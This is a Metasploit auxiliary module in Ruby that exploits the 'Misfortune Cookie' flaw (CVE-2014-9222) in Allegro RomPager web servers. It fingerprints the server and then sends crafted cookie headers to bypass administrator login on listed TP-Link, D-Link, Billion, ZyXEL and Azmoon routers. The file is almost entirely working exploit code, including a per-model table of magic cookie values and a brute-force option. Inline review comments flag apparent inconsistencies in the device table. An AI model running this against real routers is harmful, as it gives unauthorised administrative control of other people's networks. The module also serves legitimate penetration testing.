##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  # Registers module metadata and options.
  #
  # Options visible on this page:
  #   TARGETURI    - path requested for the fingerprint and for each cookie attempt ('/' by default)
  #   ForceAttempt - advanced; when true and the fingerprinted realm is not in devices_list,
  #                  every known cookie value is tried instead of giving up (see #run)
  #
  # Notes declare IOC_IN_LOGS: each request below is a plain GET with a Cookie header,
  # so every attempt is expected to appear in the target's HTTP logs.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass",
        'Description' => %q{
          This module exploits HTTP servers that appear to be vulnerable to the
          'Misfortune Cookie' vulnerability which affects Allegro Software
          Rompager versions before 4.34 and can allow attackers to authenticate
          to the HTTP service as an administrator without providing valid
          credentials.
        },
        'Author' => [
          'Jon Hart <jon_hart[at]rapid7.com>', # metasploit scanner module
          'Jan Trencansky <jan.trencansky[at]gmail.com>', # metasploit auxiliary admin module
          'Lior Oppenheim' # CVE-2014-9222
        ],
        'References' => [
          ['CVE', '2014-9222'],
          ['URL', 'https://web.archive.org/web/20191006135858/http://mis.fortunecook.ie/'],
          ['URL', 'https://web.archive.org/web/20190207102911/http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices
          ['URL', 'https://web.archive.org/web/20190623150837/http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC
        ],
        'DisclosureDate' => '2014-12-17',
        'License' => MSF_LICENSE,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'URI to test', '/']),
      ], Exploit::Remote::HttpClient
    )

    register_advanced_options(
      [
        Msf::OptBool.new('ForceAttempt', [ false, 'Force exploit attempt for all known cookies', false ]),
      ], Exploit::Remote::HttpClient
    )
  end

  # Extra request headers merged into each cookie attempt in #run.
  # Only a Referer is set; `full_uri` is provided by the HttpClient mixin (not visible here).
  #
  # @return [Hash{String => String}]
  def headers
    {
      'Referer' => full_uri
    }
  end

  # List of known values and models
  #
  # Keys are the HTTP auth realm strings that #check_response_fingerprint extracts
  # (converted to symbols by the caller). Each entry carries a vendor name, a model
  # string, and `values`: an array of [number, padding_length] pairs that #run turns
  # into a cookie. The :ALL entry is filled in at the end with the de-duplicated union
  # of every other entry's values, for the ForceAttempt path.
  #
  # @return [Hash{Symbol => Hash}]
  def devices_list
    known_devices = {
      :'AZ-D140W' =>
      {
        name: 'Azmoon', model: 'AZ-D140W', values: [
          [107367693, 13]
        ]
      },
      :'BiPAC 5102S' =>
      {
        name: 'Billion', model: 'BiPAC 5102S', values: [
          [107369694, 13]
        ]
      },
      :'BiPAC 5200' =>
      {
        name: 'Billion', model: 'BiPAC 5200', values: [
          [107369545, 9],
          [107371218, 21]
        ]
      },
      :'BiPAC 5200A' =>
      {
        name: 'Billion', model: 'BiPAC 5200A', values: [
          [107366366, 25],
          [107371453, 9]
        ]
      },
      :'BiPAC 5200GR4' =>
      {
        name: 'Billion', model: 'BiPAC 5200GR4', values: [
          [107367690, 21]
        ]
      },
      :'BiPAC 5200SRD' =>
      {
        name: 'Billion', model: 'BiPAC 5200SRD', values: [
          [107368270, 1],
          [107371378, 3],
          [107371218, 13]
        ]
      },
      :'DSL-2520U' =>
      {
        name: 'D-Link', model: 'DSL-2520U', values: [
          [107368902, 25]
        ]
      },
      :'DSL-2600U' =>
      {
        name: 'D-Link', model: 'DSL-2600U', values: [
          [107366496, 13],
          [107360133, 20]
        ]
      },
      :'TD-8616' =>
      {
        name: 'TP-Link', model: 'TD-8616', values: [
          [107371483, 21],
          [107369790, 17],
          [107371161, 1],
          [107371426, 17],
          [107370211, 5],
        ]
      },
      :'TD-8817' =>
      {
        name: 'TP-Link', model: 'TD-8817', values: [
          [107369790, 17],
          [107369788, 1],
          [107369522, 25],
          [107369316, 21],
          [107369321, 9],
          [107351277, 20]
        ]
      },
      :'TD-8820' =>
      {
        name: 'TP-Link', model: 'TD-8820', values: [
          [107369768, 17]
        ]
      },
      :'TD-8840T' =>
      {
        name: 'TP-Link', model: 'TD-8840T', values: [
          [107369845, 5],
          [107369790, 17],
          [107369570, 1],
          [107369766, 1],
          [107369764, 5],
          [107369688, 17]
        ]
      },
      :'TD-W8101G' =>
      {
        name: 'TP-Link', model: 'TD-W8101G', values: [
          [107367772, 37],
          [107367808, 21],
          [107367751, 21],
          [107367749, 13],
          [107367765, 25],
          [107367052, 25],
          [107365835, 1]
        ]
      },
      :'TD-W8151N' =>
      {
        name: 'TP-Link', model: 'TD-W8151N', values: [
          [107353867, 24]
        ]
      },
      :'TD-W8901G' =>
      {
        name: 'TP-Link', model: 'TD-W8901G', values: [
          [107367787, 21],
          [107368013, 5],
          [107367854, 9],
          [107367751, 21],
          [107367749, 13],
          [107367765, 25],
          [107367682, 21],
          [107365835, 1],
          [107367052, 25]
        ]
      },
      :'TD-W8901GB' =>
      {
        name: 'TP-Link', model: 'TD-W8901GB', values: [
          [107367756, 13],
          [107369393, 21]
        ]
      },
      :'TD-W8901N' =>
      {
        name: 'TP-Link', model: 'TD-W8901N', values: [
          [107353880, 0]
        ]
      },
      :'TD-W8951ND' =>
      {
        name: 'TP-Link', model: 'TD-W8951ND', values: [
          [107369839, 25],
          [107369876, 13],
          [107366743, 21],
          [107364759, 25],
          [107364759, 13],
          [107364760, 21]
        ]
      },
      :'TD-W8961NB' =>
      {
        name: 'TP-Link', model: 'TD-W8961NB', values: [
          [107369844, 17],
          [107367629, 21],
          [107366421, 13]
        ]
      },
      :'TD-W8961ND' =>
      {
        name: 'TP-Link', model: 'TD-W8961ND', values: [
          [107369839, 25],
          [107369876, 13],
          [107364732, 25],
          [107364771, 37],
          [107364762, 29],
          [107353880, 0],
          [107353414, 36]
        ]
      },
      :'P-660R-T3 v3' => # This value works on devices with model P-660R-T3 v3 not P-660R-T3 v3s
      {
        name: 'ZyXEL', model: 'P-660R-T3', values: [
          [107369567, 21]
        ]
      },
      :'P-660RU-T3 v2' => # Couldn't verify this
      {
        # NOTE(review): the model string repeats the previous entry ('P-660R-T3') rather
        # than matching this key; confirm against the repository source.
        name: 'ZyXEL', model: 'P-660R-T3', values: [
          [107369567, 21]
        ]
      },
      # NOTE(review): the key is written as the bare constant `ALL` here, while the
      # lookups below (`known_devices[:ALL]`, `devices_list[:ALL]` in #run) use the
      # symbol :ALL. Confirm that this resolves to :ALL in the repository source.
      ALL => # Used when `ForceAttempt` === true
      { name: 'Unknown', model: 'Forced', values: [] }
    }
    # collect all known cookies for a brute force option
    all_cookies = []
    known_devices.collect { |_, v| v[:values] }.each do |list|
      all_cookies += list
    end
    # the :ALL entry started empty, so this is exactly the de-duplicated union of the others
    known_devices[:ALL][:values] = all_cookies.uniq
    known_devices
  end

  # Decides from the HTTP fingerprint whether the target looks vulnerable.
  #
  # @param res the response to the initial GET (passed to the mixin's http_fingerprint)
  # @param fallback_status the value returned when the fingerprint does not qualify
  # @return [String, Object] the realm string captured from the fingerprint when the
  #   server reports RomPager with a version below 4.34, otherwise `fallback_status`
  def check_response_fingerprint(res, fallback_status)
    fp = http_fingerprint(response: res)
    vprint_status("Fingerprint: #{fp}")
    # ensure the fingerprint at least appears vulnerable
    # (regex literal on the left so the named captures become local variables)
    if %r{RomPager/(?<version>[\d.]+)} =~ fp
      vprint_status("#{peer} is RomPager #{version}")
      # both conditions must hold: vulnerable version range AND a realm to key devices_list on
      if Rex::Version.new(version) < Rex::Version.new('4.34') && /realm="(?<model>.+)"/ =~ fp
        return model
      end
    end
    fallback_status
  end

  # Entry point: fingerprint the target, pick the matching devices_list entry by realm,
  # then try that entry's cookie values in order until one yields a non-error response.
  #
  # Flow:
  #   * fingerprint did not qualify            -> "Unknown device"
  #   * realm not in devices_list, ForceAttempt off -> "No matching values for fingerprint ..."
  #   * realm not in devices_list, ForceAttempt on  -> try the :ALL entry (union of all values)
  #   * a response with status <= 302 stops the loop and reports success
  #
  # The success criterion is only a status check; a redirect also satisfies it, so the
  # operator is asked to confirm on the host rather than treating it as proof.
  def run
    res = send_request_raw(
      'uri' => normalize_uri(target_uri.path.to_s),
      'method' => 'GET'
    )
    # Detected doubles as the sentinel for "fingerprint did not qualify"
    model = check_response_fingerprint(res, Exploit::CheckCode::Detected)
    if model != Exploit::CheckCode::Detected
      # devices_list is keyed by symbolized realm string
      devices = devices_list[model.to_sym]
      devices = devices_list[:ALL] if devices.nil? && datastore['ForceAttempt']
      if !devices.nil?
        print_good("Detected device:#{devices[:name]} #{devices[:model]}")
        devices[:values].each do |value|
          # cookie name is "C" + first element; value is second-element many 'B's plus a NUL byte
          cookie = "C#{value[0]}=#{'B' * value[1]}\x00"
          res = send_request_raw(
            'uri' => normalize_uri(target_uri.path.to_s),
            'method' => 'GET',
            'headers' => headers.merge('Cookie' => cookie)
          )
          # nil res (no response/timeout) is treated the same as a bad status
          if !res.nil? && (res.code <= 302)
            print_good('Good response, please check host, authentication should be disabled')
            break
          else
            print_error('Bad response')
          end
        end
      else
        print_error("No matching values for fingerprint #{model}")
      end
    else
      print_error('Unknown device')
    end
  end
end